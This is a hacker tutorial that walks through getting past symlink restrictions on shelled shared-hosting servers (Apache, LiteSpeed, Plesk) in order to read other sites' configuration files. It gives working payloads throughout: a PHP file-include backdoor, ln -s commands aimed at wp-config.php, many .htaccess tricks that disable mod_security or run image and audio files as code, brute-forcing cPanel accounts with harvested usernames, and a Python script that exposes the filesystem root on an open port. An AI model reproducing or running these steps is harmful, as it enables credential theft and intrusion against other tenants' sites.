Hello Readers
Today I am going to show you
BYPASSING SYMLINK METHODS: On LINUX |
APACHE AND LITESPEED SERVERS
Requirements:
Shelled Server
Writable .htaccess
Note :
This tutorial will not work for Godaddy ,
Bluehost , Hostgrator and Hostmonstor
Servers .
Tutorial:
Firstly You Need the Following Files For This
Method:
1 -> AnonyMous KnW CGI Shell
2 -> Anonknw
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 -> Port.py
First Before Starting to symlink we need to
create php.ini and ini.php to Disable Safe
mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code
safe_mode=Off
And ini.php with
PHP Code:
<?echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "file" ]); ini_restore ("safe_mode" )
;ini_restore ( "open_basedir" );
echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "ss" ]); ?>
Download link of the files used in this method
are on the end of the tutorial .
So after creating php.ini and ini.php upload
the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN ,
CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on
Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like
/root/var/www/vhost/
where all sites will be under vhost directory .
But you wont have permission to view it so we
will create a symbolic link to root and view the
site and symlink the config files
Make a new directory in your shell example
sen then upload AnonKnw folder Then
create a
symbolic link to root .
you can manually create a symlink to
root by using the command
ln -s / root
Then You will see this
$ linking: AnonKnw.txt -> /
finishing deferred symbolic links:
.txt -> /
This means a symbolic link has been created
to / root .
Now we need to upload .htaccess use the
following
PHP Code:
Options all
DirectoryIndex Sux.html
AddType text /plain .php
AddHandler server -parsed .php
Done Bypassed Now View
/var/www/vhost/
and you will be displayed with all sites .
BYPASSING SYMLINK ON APACHE AND
LITESPEED:
Mostly when you try to symlink apache
server you will face 403 forbidden or 404
not found and 500 Internel Server Error
These can be Bypass By Using
Different .htaccess individually.
BYPASSING SYMLINK ON APACHE &
LITESPEED – Linux Servers .
First for this make a new directory in your
shell example Anonknw then upload AnonKnW.sa
and .htaccess from the AnonyMous KnW CGI shell
which i added the download link at the end of
the Tutorial
After uploading .htaccess and AnonKnW.sa to a new
directory AnonknW chmod a AnonKnW.sa to 0755
Then Open the Cgi Shell Login
( Password :--> anonknw0755 )
Now there are several methods to bypass 403
forbidden You need to try all the following
methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of
the hackers to bypass 403 forbidden Error .
So before we procced first you need to get
all /etc/passwd from the server so that we
can find the username and path of where the
sites are located .
Server mostly Many functions are
enabled which shows 403 forbidden when you
try to read cat /etc/passwd from the server
so i made a Powerfull Shell which can bypass
and get /etc/passwd from the server.
(I add alredy at the last of tutorial.)
Upload the /etc/passwd bypasser shell and
get all /etc/passwd
Then Login to AnonyMous CGI Shell and create
a symbolic link to your Target
Step 1 : ln -s / root
Step 2 : ln -s /home/username/public_html/
config.php 1.shtml
Example if our site is http://www.site.com
and username is site and its WordPress
ln -s /home/site/public_html/wp-config.php
1.shtml
So we created a Symbolic link to our Target
now you need to Go to Your Shell and Edit
the .htaccess with the following
PHP Code:
Options + FollowSymlinks
DirectoryIndex itti. html
RemoveHandler . php
AddType application / octet -stream .php
Once you done this Open the 1.shtml on your
Browser and rightclick and view source .
You
will be able to View the Config .
This is the common way of Bypass 403
forbidden and Litespeed .
Now Let Me Explain You the Advanced
Method.
Method 2 : Bypassing Symlinked Config From
Cpanel:
For This You need at least One Cpanel Access
on the sever .
I will tell you how to easily
crack Cpanel .
First Run This Command :
ls /var/mail
Then you will be displayed with all username
from the server Copy all .
Now Upload Turbo Brute Force Cpanel Script
( i attached it at last of Tutorial).
Open the Script and in User Paste all the
username we got
And for Password here is the wordlist Here :
Copy All and Paste it on Password Select
Simple and Click Submit
If Your lucky you will be displayed with
cracked cpanels.
Once you got a cpanel on the server
You can
Bypass 500 Internel Server Error 403
Forbidden Error From Port :2077 and From
error-pages from file manager.
Just symlink the config
ln -s /home/user/public_html/wp-config.php
config.shtml
Login to the cpanel
Then Go to File Manager -> Error Pages
Then Choose any of these according to what
error is triggered when you open your
symlinked config
400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example “&file=400.shtml&desc=(Bad
request)
we can get the config by
“&file=config.shtml& desc=(Bad request)
BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can
just login to port 2077
Then public_html/path/config.shtml
You will be able download the config.shtml
and you can view the source .
Method 3 : Symlink Bypass via Open Port
using Python
For this First we Python to be Installed on
Server.
To check if Python is installed run this
command python -h
If its install we can use the following python
script and Bypass
#!/usr/bin/env python
# Made in AnonKnw Labs
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__==’__main__':
os.chdir(‘/’)
Handler =
SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((“”, port),
Handler)
print(“Now open this server on webbrowser at
port : ” + str(port))
print(“example: http://site.com :” + str(port))
httpd.serve_forever()
I have added the script to downloads. Now
Upload the script to the shell.
Now run this command :
python port.py
Now Open the site with port 13123
http://www.site.com:13123
Server Bypassed From Open Port .
Method 4 : Bypassing Symlink Using .ini
Method.
Login to AnonyMous KnW CGI shell normally create a
symlink to your target in .ini Extension .
ln -s /home/user/public_html/wp-config.php
config.ini
Now go to the shell and make a new file
a.shtml
Paste the following code inside it and save it
PHP Code:
<!-- #include virtual="config.ini"-->
and save it .
Now open the a.shtml in the browser and
right click and view the source . Done
Bypassed
Method 5 : Bypassing Symlink Using ReadMe
file.
Make a new directory in your shell From the
Cgi shell normally symlink the config
Code:
ln -s /home/user/public_html/config.php
config.txt
now make .htaccess with the following code .
PHP Code:
.htaccess
Options All
ReadMeName config .txt
Now when you open the directory on the
browser you will be displayed with the config
source directly .
eg : site.com/Anonknw/config.txt is your symlinked
config then when you open
http://www.site.com/AnonKnw/ you symlinked
config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to
Bypass Symlink If you will have problem
Bypassing Try all the Following .htaccess
1 – >
PHP Code:
.htaccess
Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php
2 ->
PHP Code:
.htaccess
Options All
DirectoryIndex ssss. html
addType txt . php
AddHandler txt . php< IfModule mod_
security .c >SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>
3 ->
PHP Code:
.htaccess
suPHP_ConfigPath / home/ user/ public_html /
php. ini
4 ->
PHP Code:
.htaccess
Options + FollowSymLinks
DirectoryIndex Sux.html
Options + Indexes
AddType text /plain .php
AddHandler server -parsed .php
AddType text /plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php< IfModule mod_
autoindex .c > IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble</ ifModule>
< IfModule mod_security .c > SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>
.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
PHP Code:
.htaccess
AddType
application /x -httpd -cgi . py
AddHandler cgi - script . py
AddHandler cgi - script . py
This one is to make perl work :
PHP Code:
.htaccess
AddType application / x- httpd- cgi .pl
AddHandler cgi - script . pl
AddHandler cgi - script . pl
This one is to enable Symlink if the function is
disabled in the server :
PHP Code:
.htaccess< Directory "/home" > *** Options -
ExecCGI * ***AllowOverride
AuthConfig Indexes
Limit FileInfo
Options= IncludesNOEXEC ,Indexes ,Includes ,
MultiViews ,SymLinksIfOwnerMatch ,
FollowSymLinks</ Directory>
This one is to retrieve users permissions :
PHP Code:
.htaccess
AddType text /plain .php
Options + Indexes
DirectoryIndex filename .html
Bypass Internal Server error :
PHP Code:
.htaccess< IfModule mod_security . c>
SecFilterEngine Off SecFilterScanPOST Off </
IfModule>
Change php version:
PHP Code:
.htaccess
AddType application / x- httpd- php4 .php
Bypass Uploads Options and upload shell in
another extension :
PHP Code:
< FilesMatch "^.*.mp3" > SetHandler
application /x -httpd -php </ FilesMatch>
Retrieve Config with picture method :
PHP Code:
.htaccess
Options FollowSymLinks MultiViews Indexes
ExecCGI
AddType application / x- httpd- cgi .gif
AddHandler cgi - script . gif
AddHandler cgi - script . gif
So that’s it i think i had covered everything
thats related to Bypass Symlink and Disabled
Functions on Server .
DOWNLOAD THE SCRIPTS I HAVE USED ON
THE TUTORIAL >>Here<<
Password of zip:- ([[[[[anonknw]]]]])
(Without braces)
Hope U Enjoy Reading
Reagards
AnonyMous Knw